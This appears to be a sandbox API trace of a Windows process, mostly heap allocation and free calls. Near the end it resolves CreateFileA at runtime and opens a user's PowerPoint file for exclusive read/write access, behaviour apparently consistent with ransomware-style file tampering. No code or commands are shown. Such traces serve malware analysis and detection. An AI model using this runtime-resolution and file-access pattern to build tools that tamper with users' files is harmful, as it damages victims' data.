[0173.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0173.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0173.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0173.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0173.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0173.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0173.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0173.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0173.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0173.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0173.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0173.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0173.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0173.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0173.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0173.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0173.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0173.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0173.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0173.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0173.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0173.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0173.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0173.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0173.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0173.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0173.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0173.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0173.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0173.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0173.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0173.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0173.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0173.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0173.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0173.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0173.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0173.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0173.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0173.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0173.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0173.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0173.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0173.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0173.707] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0173.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0173.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0173.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0173.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0173.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0173.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0173.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0173.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0173.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0173.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0173.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0173.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0173.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0173.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0173.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0173.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0173.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0173.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0173.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0173.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0173.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0173.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0173.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0173.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0173.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0173.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0173.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0173.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0173.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0173.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0173.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0173.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0173.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0173.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0173.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0173.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0173.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0173.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0173.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0173.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0173.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0173.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0173.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0173.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0173.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0173.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0173.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0173.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0173.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0173.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0173.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0173.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0173.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0173.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0173.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0173.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0173.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0173.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0173.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0173.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0173.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0173.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0173.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0173.710] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0173.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0173.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0173.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0173.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd5a0 [0173.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd5a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0173.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0173.711] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0173.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0173.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0173.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0173.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0173.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0173.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0173.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0173.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5a0 [0173.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd5a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0173.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0173.711] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0173.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0173.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0173.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0173.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0173.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0173.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0173.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0173.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0173.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0173.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0173.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0173.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xa5f008 [0173.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0173.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3b) returned 0x8db0a8 [0173.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx", cchWideChar=59, lpMultiByteStr=0x8db0a8, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx", lpUsedDefaultChar=0x0) returned 59 [0173.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0173.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0173.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0173.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0173.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0173.713] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lvw qc5ro32oh.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0173.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0173.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0173.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0173.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0173.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0173.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0173.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0173.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0173.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0173.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0173.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0173.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0173.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0173.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa5f008, cbMultiByte=59, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0173.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x76) returned 0x8afe68 [0173.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa5f008, cbMultiByte=59, lpWideCharStr=0x8afe68, cchWideChar=59 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx") returned 59 [0173.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0173.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0173.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8afe68 | out: hHeap=0x8a0000) returned 1 [0173.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0173.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0173.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0173.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0173.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0173.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0173.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0173.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0173.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0173.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0173.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0173.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0173.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0173.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0173.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0173.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0173.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0173.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0173.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0173.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0173.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0173.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0173.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0173.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0173.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0173.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0173.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 